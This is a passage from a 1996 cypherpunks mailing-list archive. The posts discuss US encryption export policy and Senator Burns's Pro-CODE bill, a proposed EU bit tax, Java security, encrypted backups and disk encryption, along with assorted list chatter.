encrypted, except that people apparently wanted to practice their PGP
skills. (For those who sent me items that had a reason to be encrypted, you
know who you are and you know this comment does not apply to you.)

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joseph M. Reagle Jr." <reagle@MIT.EDU>
Date: Fri, 3 May 1996 13:41:47 +0800
To: cypherpunks@toad.com
Subject: Best Digital Signature Lib from a WEB server
Message-ID: <9605022208.AA09593@rpcp.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


        Can anyone recommend a signature implementation for cgi/forms? For
instance, someone registers on a WEB site and gets a signed receipt back.
(No cookies or such, because the receipt will be show to 3rd party members.)
I'm thinking in terms of self-labeling and PICS like work. The PICS Label
Syntax and Communication Protocols mentions that Jim Bidzos has agree to
allow RSAREF to be available to PICS developers at no cost. Has anyone tried
this, or actually implemented a scheme like this?
_______________________
Regards,            I, man, am regal; a German am I
Joseph  Reagle      http://farnsworth.mit.edu/~reagle/home.html
reagle@mit.edu      E0 D5 B2 05 B6 12 DA 65  BE 4D E3 C1 6A 66 25 4E





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 3 May 1996 18:41:32 +0800
To: cypherpunks@toad.com
Subject: Re: EET on PGP API Quash
Message-ID: <m0uFA0c-00094iC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:22 PM 5/2/96 -0700, Martin Minow wrote:
>>   ... the State Department is taking
>>   an increasingly hard line on PGP. Where once the State had
>>   restricted itself to warning developers against exporting
>>   source code with PGP file-encryption routines, it is now
>>   arguing that application programming interfaces (API)
>>   allowing PGP program insertion should be subject to control
>>   under arms-trading statutes.
>
>It would seem that any computer system that permits the use
>of an externally-supplied computer program (i.e., Windows,
>DOS, MacOS, Unix, Java, Microsoft Word macro languange) would
>fall under this restriction.
>
>I wonder how much thought went into this decision.

Not much.

I seem to recall a quote from Dorothy Denning a couple of months ago where 
she actually held out API's as a way to get around the ITAR restrictions.  
It sounds to me like even that was too much for them!

In any case, this position is very desperate.  Those of us who recall old 
Altair computers remember a time where even a "file" was a foreign concept.  
Files are, arguably, a standardized format on which encryption programs 
work.  Are they going to stop the export of MSDOS?

Jim Bell
jimbell@pacifier.comJim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: HardWorkingStudent <razz@eden.rutgers.edu>
Date: Fri, 3 May 1996 14:08:51 +0800
To: cypherpunks@toad.com
Subject: unsescribe
Message-ID: <CMM-RU.1.5.831078334.razz@er5.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


unsescribe razz@eden.rutgers.edu
unsuscribe razz@eden.rutgers.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Fri, 3 May 1996 17:34:53 +0800
To: cypherpunks@toad.com
Subject: SF South Bay: So WhoWhere wants to meet with people interested in online privacy and security...
Message-ID: <Pine.GUL.3.93.960502184852.13717T-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


The people who run www.whowhere.com (a knockoff on the excellent
www.four11.com, with a database partly based on a script they wrote to
extract addresses from okra.ucr.edu) want to discuss how they can serve
the Internet community better while protecting privacy.

I suggested "shut down your site and become cloistered monks," but they
didn't find that consistent with their business plan. So they suggested we
do lunch early next week. Either Monday or Tuesday would work, and we'd be
meeting in downtown Palo Alto. Anybody else interested in coming? 

For a good demonstration of why WhoWhere? is not necessarily the greatest
thing since spice racks, look up "Louis Freeh," "Fuck You,"  "Asshole,"
"System Privileged User," and "Stephen Hawking." I keep telling them that
they'd better remove this last, but they don't consider it a priority.

-rich
 http://www-leland.stanford.edu/~llurch/

P.S.   Yes, I just resubscribed. I just love you too much to stay away.

P.P.S. If anyone wants to carpool from the Palo Alto vicinity to Joe &
       Cindy's beach volleyball shindig this Sunday with an alleged
       FUCKING STATIST CAPITALIST SOCIALIST NAZI J*W ANARCHIST, send me
       a note.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rmfan@alpha.c2.org (Remailer Fan)
Date: Fri, 3 May 1996 16:54:14 +0800
To: cypherpunks@toad.com
Subject: Sen. Patrick Leahy's Pubkey
Message-ID: <199605030232.TAA13008@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain



He even self-signed it.

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCNAzFymr0AAAEEANJxXN9TRI8tHscJ52bTT70Ou8vH0+Xmx19UHnFUaLLNErjO
3Pwr2t6qgnPWI6QRGMUu6boDFMarX0BaWGFUtQ21rNwpU2qtNnQo3M5Ax2rD4Ssi
feJuRnsWNO8HVXMbHkGJ3fWqXfRrnEz9IPnz7RekGm3o156DeBM5YGSLu9/1AAUR
tC5QYXRyaWNrIExlYWh5IDxzZW5hdG9yX2xlYWh5QGxlYWh5LnNlbmF0ZS5nb3Y+
iQCVAwUQMXU9PRM5YGSLu9/1AQFgeAP+LirgSxbJSmx933EdsrW7NO66D2HotVEE
q6jhRxFmCht29R43DF2XtxHWddJE4FFLQ7JneWS3aYuf8Ucx8voWdrOlgeo5kadv
HZGrThaKGdWREVF2VwYIuJcR0P0Mp2RZGmKtc9H08EImcHIqC8LFc1Mbfs2XvVZC
ASjDvnBc4wI=
=wNg+
-----END PGP PUBLIC KEY BLOCK-----

Remailer fan.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Conrad_Burns@burns.senate.gov
Date: Fri, 3 May 1996 16:43:04 +0800
To: roundtable@cni.org
Subject: Open Letter to Internet Community From Senator Burns
Message-ID: <9604028310.AA831091003@smtpgwyo.senate.gov>
MIME-Version: 1.0
Content-Type: text/plain


     OPEN LETTER TO THE INTERNET COMMUNITY
     
     May 2, 1996
     
     Dear friends:
     
     As an Internet user, you are no doubt aware of some of the hurdles the 
     federal government has put up that limit the growth and full potential 
     of exciting, emerging technologies.  One of the most egregious of 
     these has been the governmentally set limits on so-called "encryption" 
     technologies.  Today I am introducing a bill to address this major 
     problem for businesses and users of the Internet. 
     
     If the telecommunications law enacted this year is a vehicle to 
     achieve real changes in the ways we interact with each other 
     electronically, my bill is the engine that will allow this vehicle to 
     move forward.  The bill would promote the growth of electronic 
     commerce, encourage the widespread availability to strong privacy and 
     security technologies for the Internet, and repeal the out-dated 
     regulations prohibiting the export of encryption technologies.
     
     This legislation is desperately needed because the Clinton 
     administration continues to insist on restricting encryption exports, 
     without regard to the harm this policy has on American businesses' 
     ability to compete in the global marketplace or the ability of 
     American citizens to protect their privacy online.  Until we get the 
     federal government out of the way and encourage the development of 
     strong cryptography for the global market, electronic commerce and the 
     potential of the Internet will not be realized.
     
     The last thing the Net needs are repressive and outdated regulations 
     prohibiting the exports of strong privacy and security tools and 
     making sure that the government has copies of the keys to our private 
     communications.  Yet this is exactly the situation we have today.
     
     My new bill, the Promotion of Commerce On-Line in the Digital Era 
     (Pro-CODE) Act of 1996, would:
     
     - Allow for the unrestricted export of "mass-market" or 
     "public-domain" encryption programs, including such products as Pretty 
     Good Privacy and popular World Wide Web browsers.
     
     - Require the Secretary of Commerce to allow the unrestricted export 
     of other encryption technologies if products of similar strength are 
     generally available outside the United States.
     
     - Prohibit the federal government from imposing mandatory key-escrow 
     encryption policies on the domestic market and limit the authority of 
     the Secretary of Commerce to set standards for encryption products.
     
     Removing export controls will dramatically increase the domestic 
     availability of strong, easy-to-use privacy and security products and 
     encourage the use of the Internet as a forum of secure electronic 
     commerce. It will also undermine the Clinton Administration's 
     "Clipper" proposals which have used export restrictions as leverage to 
     impose policies that guarantee government access to our encryption 
     keys.
     
     The Pro-CODE bill is similar to a bill I co-authored with Senator 
     Patrick Leahy of Vermont, except that it highlights the importance of 
     encryption to electronic commerce and the need to dramatically change 
     current policy to encourage its growth.  My bill does not add any new 
     criminal provisions and does not establish legal requirements for 
     key-escrow agents.
     
     Over the coming months, I plan to hold hearings on this bill and 
     encourage a public debate on the need to change the Clinton 
     Administration's restrictive export control policies.  I will need 
     your support as we move forward towards building a global Internet 
     that is good for electronic commerce and privacy.  I look forward to 
     working with the Internet community, online activists, and the 
     computer and communications industry as this proposal moves through 
     Congress.
     
     I'd like to hear from you, so please join me on two upcoming online 
     events to talk about the new bill.  The first is on America Online in 
     the News Room auditorium at 9 p.m. Eastern Daylight Time on May 6.  
     The second will be on Hotwired's Chat at 9 p.m. EDT on May 13.
     
     In the meantime, I need your help in supporting the effort to repeal 
     cryptography export controls.  You can find out more by visiting my 
     web page http://www.senate.gov/~burns/.  There you will find a 
     collection of encryption education resources that my Webmaster has 
     assembled.  I trust that the entire Internet community, from the 
     old-timers to those just starting to learn about encryption, will find 
     this information useful.
     
     This bill is vital to all Americans, from everyday computer users and 
     businesses to manufacturers of computer software and hardware.  I very 
     much look forward to working with you on this issue.
     
     Conrad Burns
     United States Senator





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 3 May 1996 20:24:30 +0800
To: cypherpunks@toad.com
Subject: Bit tax again?
Message-ID: <m0uFAuj-00092EC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


I hesitate to write about this, but the old "bit tax" idea has surfaced 
again, this time reported in Electronic Engineering Times, page 1, April 29, 
1996 issue.   I include the article below.  My comments will follow in 
another note shortly!


Europe:  Try to send it, we'll tax your bits

By Peter Clarke

Brussels, Belgium-- A report prepared for the European Commission (EC) urges 
it to consider levying a "bit tax" on information sent over the Internet and 
other networks.  The recommendation runs counter to the reining sentiment 
among U.S. regulators, who have sought to avoid being cast as "bit cops."

The EC report reasons that the value of the average cyberspace transaction 
will increase as time goes by, resulting in fewer physical transactions.  
The upshot, the report says, will be a shrinking government tax base.  
Evidence of such a trend may already have surfaced:  Use fo the Internet to 
import goods and services electronically from outside the continent has 
allowed some Europeans to avoid payments under Europe's value-added-tax 
(VAT) system.

Luc Soete--director of the Maastricht Economic Research Institute on 
Innovation and Technology (Limburg, Netherlands) and chairman of the high 
Level Expert Group (HLEG) that prepared the report on the social aspects of 
the information society--has examples at the read to prove the potential of 
Internet commerce to erode the tax base.  Soete observed last week that 
sending his group's report by mail or courier, rather than electronically, 
would involve taxes on fuel purchases and on the profits fo the companies 
involved in physically shuttling the document to recipients.  

"As society moves toward the information society, tax revenue needs to shift 
emphasis from material goods to virtual goods and services," he said.  I 
think we will see a very rapid introduction [of such a tax structure] in one 
or two years' time."

Soete said he believes the tax "can be introduced in a very straightforward 
way.  Every telephone operator and service provider has a record of the 
bytes moved.  They can be the tax collectors."

He acknowledged the prevailing "negative view about a bit tax" and 
attributed it in part of "concern that it could inhibit adoption of 
information technology.   But once people have the technology, not many 
would go back.  Whether the tax is 1 cent per bit or 1 cent per kbit is, of 
course, completely open."

At the same time, U.S. regulators, who hope to expand Internet access to 
schools, libraries and low-income individuals, have resisted efforts to cast 
them in the role of bit cops charged with monitoring Internet traffic.

Free Internet

The Federal Communications Commission, which has conducted a series of 
highly profitable spectrum auctions for wireless and satellite services, 
last week proposed reserving some wireless spectrum for free Internet access 
for schools and libraries.

Soete last week cast the bit tax as a progressive levy that would fall 
hardest on big business and that would not deter private individuals from 
joining the information society.  Indeed, the potential of the information 
revolution to further polarize society is among the concerns expressed in 
the report.

Soete believes the bit-tax should be used to fund social security or 
welfare.  "Labor can no longer be the source of revenue for social 
security," he said.

Steve Kennedy, business-development manager at the Internet service provider 
Demon Internet Ltd. (London) doesn't share Soete's positive view of the bit 
tax.  "Such a tax would be very difficult to monitor and police," Kennedy 
asserted.  "We transfer about 1.5 Gbytes of data a day, but we don't keep a 
lot of customer information.  Who's going to pay for the equipment and 
software to log all this?"

He added that if his company was "simply taxed on the data transfer, we 
would have to pass it on to the customers, and that would penalize the small 
user."

The HLEG report is lavelled as an interim document that is intended to 
generate public comment.  The final report will be published by year's end.  

The interim report can be accessed from http://www.ispo.cec.be/hleg/hleg.htmlJim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: VaX#n8 <vax@linkdead.paranoia.com>
Date: Fri, 3 May 1996 15:53:10 +0800
To: cypherpunks@toad.com
Subject: encrypted Unix backup software
Message-ID: <199605030102.UAA06977@linkdead.paranoia.com>
MIME-Version: 1.0
Content-Type: text/plain


Okay, before you flame me and tell me to pipe it through
a symmetric cipher filter, hear me out.  Tape handling is
hairy, depending on what kind of functionality you want.  A regular
filter may write(2) in strangely sized blocks, not working very well
with your tape drive.

Mostly though, things get difficult when you have to/want to deal with
multiple tapes.

Although I could probably hack up "catblock" to do the job, and use
a line of the form
dump -0uBf ... | symmetric_cipher | catblock blockfactor > /dev/tape
if there exists something which already does this job, or something like it,
I'd like to know.  Now that I think about it, maybe this is the cleanest way.

PS: If there is a place where I can get reviews of the crypto software
that is out there, that'd be fab because csua just has a TON of stuff!
The "security-faq" is pretty good -- I want more! :)

Keep codin'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 3 May 1996 14:47:03 +0800
To: frantz@netcom.com (Bill Frantz)
Subject: Re: Burns Bill
In-Reply-To: <199605022252.PAA01532@netcom8.netcom.com>
Message-ID: <199605030018.UAA21700@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Bill Frantz writes:
> A quick read thru the text of the bill (via http://www.cdt.org/crypto/)
> shows none of the principle objectionable features of the Lehey bill. 
> (Standards for key escrow agents, and additional criminal penalties for
> using encryption to hinder an investigation.)
> 
> This bill has some obscure, to me, exceptions.  The most troubling of which
> I think means (IANAL) that export can be restricted if there is a
> reasonable expectation that the hard/software will be reexported to one of
> the countries on the extreme bad boys list.

I will point out that as things stand under U.S. law you aren't even
allowed to export toilet paper if the expectation is that the ultimate
customer is on the extreme bad boys list. Although as a libertarian I
find any such provision distasteful I cannot see that we are badly off
if the rules for exporting crypto and exporting toilet paper are
roughtly similar.

> in any case, it is not clear how passage of the bill could possibly
> make things worse.

I think that is key.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Fri, 3 May 1996 16:51:43 +0800
To: cypherpunks@toad.com
Subject: Win 95 partition encryptor?
Message-ID: <v02120d07adaf29b357d8@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


What's our current favorite utility to encrypt an entire extended partition
under Win 95? Should be as transparent as possible, easy to use, have
automatic timeout, etc. Solid crypto, of course.

TIA,

Disclaimer: My opinions are my own, not those of my employer.

-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 3 May 1996 15:01:56 +0800
To: cypherpunks@toad.com
Subject: Conrad_Burns@burns.senate.gov: Open Letter to Internet Community From Senator Burns
Message-ID: <199605030022.UAA21727@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Yes, I know this will probably be forwarded five hundred
times. However, I thought I ought to try to be the first.

------- Forwarded Message

Date: Thu, 2 May 1996 19:39:04 -0400
From: Conrad_Burns@burns.senate.gov
To: Multiple recipients of list <com-priv@lists.psi.com>
Subject: Open Letter to Internet Community From Senator Burns

     OPEN LETTER TO THE INTERNET COMMUNITY
     
     May 2, 1996
     
     Dear friends:
     
     As an Internet user, you are no doubt aware of some of the hurdles the 
     federal government has put up that limit the growth and full potential 
     of exciting, emerging technologies.  One of the most egregious of 
     these has been the governmentally set limits on so-called "encryption" 
     technologies.  Today I am introducing a bill to address this major 
     problem for businesses and users of the Internet. 
     
     If the telecommunications law enacted this year is a vehicle to 
     achieve real changes in the ways we interact with each other 
     electronically, my bill is the engine that will allow this vehicle to 
     move forward.  The bill would promote the growth of electronic 
     commerce, encourage the widespread availability to strong privacy and 
     security technologies for the Internet, and repeal the out-dated 
     regulations prohibiting the export of encryption technologies.
     
     This legislation is desperately needed because the Clinton 
     administration continues to insist on restricting encryption exports, 
     without regard to the harm this policy has on American businesses' 
     ability to compete in the global marketplace or the ability of 
     American citizens to protect their privacy online.  Until we get the 
     federal government out of the way and encourage the development of 
     strong cryptography for the global market, electronic commerce and the 
     potential of the Internet will not be realized.
     
     The last thing the Net needs are repressive and outdated regulations 
     prohibiting the exports of strong privacy and security tools and 
     making sure that the government has copies of the keys to our private 
     communications.  Yet this is exactly the situation we have today.
     
     My new bill, the Promotion of Commerce On-Line in the Digital Era 
     (Pro-CODE) Act of 1996, would:
     
     - Allow for the unrestricted export of "mass-market" or 
     "public-domain" encryption programs, including such products as Pretty 
     Good Privacy and popular World Wide Web browsers.
     
     - Require the Secretary of Commerce to allow the unrestricted export 
     of other encryption technologies if products of similar strength are 
     generally available outside the United States.
     
     - Prohibit the federal government from imposing mandatory key-escrow 
     encryption policies on the domestic market and limit the authority of 
     the Secretary of Commerce to set standards for encryption products.
     
     Removing export controls will dramatically increase the domestic 
     availability of strong, easy-to-use privacy and security products and 
     encourage the use of the Internet as a forum of secure electronic 
     commerce. It will also undermine the Clinton Administration's 
     "Clipper" proposals which have used export restrictions as leverage to 
     impose policies that guarantee government access to our encryption 
     keys.
     
     The Pro-CODE bill is similar to a bill I co-authored with Senator 
     Patrick Leahy of Vermont, except that it highlights the importance of 
     encryption to electronic commerce and the need to dramatically change 
     current policy to encourage its growth.  My bill does not add any new 
     criminal provisions and does not establish legal requirements for 
     key-escrow agents.
     
     Over the coming months, I plan to hold hearings on this bill and 
     encourage a public debate on the need to change the Clinton 
     Administration's restrictive export control policies.  I will need 
     your support as we move forward towards building a global Internet 
     that is good for electronic commerce and privacy.  I look forward to 
     working with the Internet community, online activists, and the 
     computer and communications industry as this proposal moves through 
     Congress.
     
     I'd like to hear from you, so please join me on two upcoming online 
     events to talk about the new bill.  The first is on America Online in 
     the News Room auditorium at 9 p.m. Eastern Daylight Time on May 6.  
     The second will be on Hotwired's Chat at 9 p.m. EDT on May 13.
     
     In the meantime, I need your help in supporting the effort to repeal 
     cryptography export controls.  You can find out more by visiting my 
     web page http://www.senate.gov/~burns/.  There you will find a 
     collection of encryption education resources that my Webmaster has 
     assembled.  I trust that the entire Internet community, from the 
     old-timers to those just starting to learn about encryption, will find 
     this information useful.
     
     This bill is vital to all Americans, from everyday computer users and 
     businesses to manufacturers of computer software and hardware.  I very 
     much look forward to working with you on this issue.
     
     Conrad Burns
     United States Senator



------- End of Forwarded Message





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 3 May 1996 15:11:21 +0800
To: mpd@netcom.com (Mike Duvos)
Subject: Re: [RANT] Mr. Scruffy versus Mr. Neat
In-Reply-To: <199605010408.VAA23530@netcom10.netcom.com>
Message-ID: <199605030025.UAA21735@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Mike Duvos writes:
> While Java is currently a scruffy invention and has yet to
> recieve the official blessing of the neats, there are a number of
> things that speak in its favor.

I would like to re-emphasize that given its design, Java was, if
anything, created by "neats". The problem is that its model requires
perfection to assure security, instead of conservative design which
assumes there may be design flaws and produces "defense in depth".

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 3 May 1996 14:32:10 +0800
To: Hal <hfinney@shell.portal.com>
Subject: Re: Why I dislike Java. (was Re: "Scruffies" vs. "Neats")
In-Reply-To: <199605010521.WAA02990@jobe.shell.portal.com>
Message-ID: <199605030034.UAA21754@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Hal writes:
> From: "Perry E. Metzger" <perry@piermont.com>
> > Unfortunately, when the same machine runs Netscape so the
> > trader can read the UUNet/MFS merger press release and also has the
> > big shiny red "trade!" button on some application, you get nervous.
> 
> Aren't you holding Java to a higher standard than ordinary applications?
> If your traders run any software at all on their machines there is the
> risk of harm.  The Netscape binary itself could be hacked to do bad
> things.  Likewise with any other software they run.

At one of my clients, there is a software testing lab where all
software that is placed on the trading floor is rigorously tested for
months before it is put out on the users desktop -- it is, indeed,
tested in conjunction with all other products the user would be
using. No software is deployed before rigorous testing occurs. By the
time the thing is put out, it is known to a high degree of certainty
that it will not cause damage.

This wasn't even something I requested -- they had this in place
before I got there. This isn't that unusual on Wall Street, either --
I know of a number of firms with similar "integration labs", "test
labs", etc.

Netscape with Java cannot be so tested because important components
come down off the net.  So no, I'm not holding Netscape with Java to a
higher standard. I'm very much holding it to the same standard.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 3 May 1996 14:56:37 +0800
To: Alex Strasheim <cp@proust.suba.com>
Subject: Re: Why I dislike Java. (was Re: "Scruffies" vs. "Neats")
In-Reply-To: <199605010528.AAA00506@proust.suba.com>
Message-ID: <199605030038.UAA21763@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Alex Strasheim writes:
> One thing that I'm sort of fuzzy on is whether or not you feel that this 
> is a problem specific to this one group of products (java) or if it's a 
> problem with the general idea of grabbing and running applets 
> indiscriminently in a protective environment.

I believe that it is possible to design environments in which you can
safely run applet like things. However, 1) I am not sure that such an
environment is needed for most of what Java does in the Netscape
environment, so given the dangers I'm not sure the price is worth
paying, 2) Java does not possess the characteristics such an
environment needs, and 3) It is pretty clear that much of what the
Java designers want to do could not be done in such an environment.

> Right now, as near as I can tell, we have two major security complaints
> with java's design.  The first is Perry's point (which I might be
> munging), that there isn't enough redundancy in the security to protect us
> if and when human error creeps in.  The second is that a rigorous formal
> analysis of the language hasn't been performed, and that the language as
> it is currently constituted doesn't lend itself to such an analysis. 

I would very much prefer a language who's security did not require
such analysis. Java, sadly, does require such an analysis because it
requires perfect implementation for its security model to work. In a
restricted execution environment that was designed with defense in
depth in mind, such an analysis would be a bonus, but not strictly
required.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 3 May 1996 16:28:23 +0800
To: Wei Dai <weidai@eskimo.com>
Subject: Re: no-cost DH?
In-Reply-To: <Pine.SUN.3.93.960501000301.3114A-100000@eskimo.com>
Message-ID: <199605030048.UAA21799@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Wei Dai writes:
> Apparently Cylink is only licensing their SDK at no cost, not the actual
> patents.  Does anyone want to speculate on why they are doing this now?

To make as much money as they can in the short time they have
available.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Fri, 3 May 1996 18:52:54 +0800
To: cypherpunks@toad.com
Subject: Re: Sun's Wallet
Message-ID: <v02120d08adaf30906966@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:18 5/2/96, Steven L Baur wrote:
>> Sydney, Australia, April 30 -- SunSoft will shortly
>> release a workable cash-on-the-Internet program called
>> Wallet
>
>> Once issued, the Digital ID can
>> be used within any enabled application such as Netscape
>> Navigator Internet client software and Netscape
>> SuiteSpot.
>
>Will it be supported by ApacheSSL?

The Java Wallet is supposed to work with any Java enabled browser. The
wallet takes care of moving all the data even through firewalls, so I would
assume it just piggy-backs on http. Note that anyone can create a Wallet
"cassette" for their own present of future payment system. In order for the
cassette to work with the wallet, it needs to be signed by Java Soft. Java
Soft will charge for the sigs. Last I heard, the exact fee was still
undecided.





Disclaimer: My opinions are my own, not those of my employer.

-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Fri, 3 May 1996 17:31:39 +0800
To: HardWorkingStudent <razz@eden.rutgers.edu>
Subject: Re: unsescribe
In-Reply-To: <CMM-RU.1.5.831078334.razz@er5.rutgers.edu>
Message-ID: <Pine.SOL.3.91.960502205607.7927A-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 2 May 1996, HardWorkingStudent wrote:

> unsescribe razz@eden.rutgers.edu
> unsuscribe razz@eden.rutgers.edu

unsescribe is not a valid use of the 'ses' service mark. Please report 
for termination immediately. 

(Of course, if actually you want to be terminated, you might find it less 
painful to send a message to majordomo@toad.com containing the body

unsubscribe cypherpunks

Simon

---
They say in  online country             So which side are you on boys
There is no middle way                  Which side are you on
You'll either be a Usenet man           Which side are you on boys
Or a thug for the CDA                   Which side are you on?
  National Union of Computer Operatives; Hackers, local 37   APL-CPIO






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 3 May 1996 19:15:24 +0800
To: perry@piermont.com
Subject: Re: Why I dislike Java. (was Re: "Scruffies" vs. "Neats")
Message-ID: <199605030343.UAA01908@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:34 PM 5/2/96 -0400, Perry wrote:
>At one of my clients, there is a software testing lab where all
>software that is placed on the trading floor is rigorously tested for

Definitely - aside from severe dangers like automated theft or incorrect output,
even software that takes a PC down for 5 minutes during the trading day
every once in a while can cost big money to a brokerage firm.

>Netscape with Java cannot be so tested because important components
>come down off the net.  So no, I'm not holding Netscape with Java to a
>higher standard. I'm very much holding it to the same standard.

Netscape now lets you turn off Java and Javascript.  An ideal would be to
support running applications signed by your choice of application-certifiers,
which is BTW likely to be much more restrictive that your list of
key-certifiers if you're in a paranoid business like brokerages and airlines.
#					Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215
begin 777 goodtimes
=96-H;R!H879I;F<@9V]O9"!T:6UE<R!Y970_#0H0
 
end






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Fri, 3 May 1996 19:34:42 +0800
To: VaX#n8 <vax@linkdead.paranoia.com>
Subject: Re: encrypted Unix backup software
Message-ID: <199605030343.UAA01915@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:02 PM 5/2/96 -0500, VaX#n8 <vax@linkdead.paranoia.com> wrote:
>Okay, before you flame me and tell me to pipe it through
>a symmetric cipher filter, hear me out.  Tape handling is
>hairy, depending on what kind of functionality you want.  A regular
>filter may write(2) in strangely sized blocks, not working very well
>with your tape drive.
>
>Mostly though, things get difficult when you have to/want to deal with
>multiple tapes.
>
>Although I could probably hack up "catblock" to do the job, and use
>a line of the form
>dump -0uBf ... | symmetric_cipher | catblock blockfactor > /dev/tape
>if there exists something which already does this job, or something like it,
>I'd like to know.  Now that I think about it, maybe this is the cleanest way.

Yup.  It's a classic Unix tools approach - let each piece do what it
does best, and use a standard simple interface between tools.
You don't need to write "catblock", though - there's the "dd" command
designed for just such applications (well, designed for the way
those applications looked 20 years ago, when you needed to do things
like EBCDIC conversion and line-length padding to deal with IBM tapes,
and the syntax has a certain evil OS360 JCL look to it :-)
Newer versions may handle multiple tapes a bit better.
#					Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215
begin 777 goodtimes
=96-H;R!H879I;F<@9V]O9"!T:6UE<R!Y970_#0H0
 
end






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Fri, 3 May 1996 17:29:28 +0800
To: jamesd@echeque.com
Subject: [Complete NOISE] Re: aufweidersehn, * grave$
In-Reply-To: <199605021530.IAA18089@dns2.noc.best.net>
Message-ID: <Pine.BSF.3.91.960502211640.9225D-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain



On Thu, 2 May 1996 jamesd@echeque.com wrote:

> Some anonymous illiterate racist socialist wrote:
> > Noticeable about capitali$t graves, he dissmisses EVERY attempt
> > to censor racists with a "who cares," "there just a bunch
> > of weinies," "if you can be heard *somewhere* without being
> > arrested, it's not censorship," etc.
> 
> In defense of Rich, note that we libertarians accused 
> him of being a socialist, and this anonymous socialist 
> accuses him of being a capitalist.

What's in a name (or a nym) ? ;)

-r.w.
Capitalist-diseased-marsupial (and proud of it)

(A consortium of Fed. Reserve insiders, AT&T, and Popeye's Fried Chicken 
execs control the world. Anyone ranting against other forms of government 
is wasting their time. Long live the Illuminati!)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Fri, 3 May 1996 18:42:20 +0800
To: Mike McNally <m5@vail.tivoli.com>
Subject: Re: [getting off topic] Re: Freedom and security
In-Reply-To: <3188FCD2.3885@vail.tivoli.com>
Message-ID: <Pine.BSF.3.91.960502212748.9225E-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain



On Thu, 2 May 1996, Mike McNally wrote:

> Rabid Wombat wrote:
> 
> > If I send snail, there are "rules" governing who can open the envelope.
> > If I'm suspected of criminal activity, the community has recourse.
> 
> If you don't encrypt or otherwise secure sensitive surface mail the same 
> way you would e-mail, you deserve what you get.  The community, of course,
> is in the same state with secure snail-mail case as it is with PGP-encrypted
> e-mail.
> 
Yes, I CAN encrypt. The point being discussed is whether society should 
allow me to do so, and if I have the RIGHT to do so. Classic freedom of 
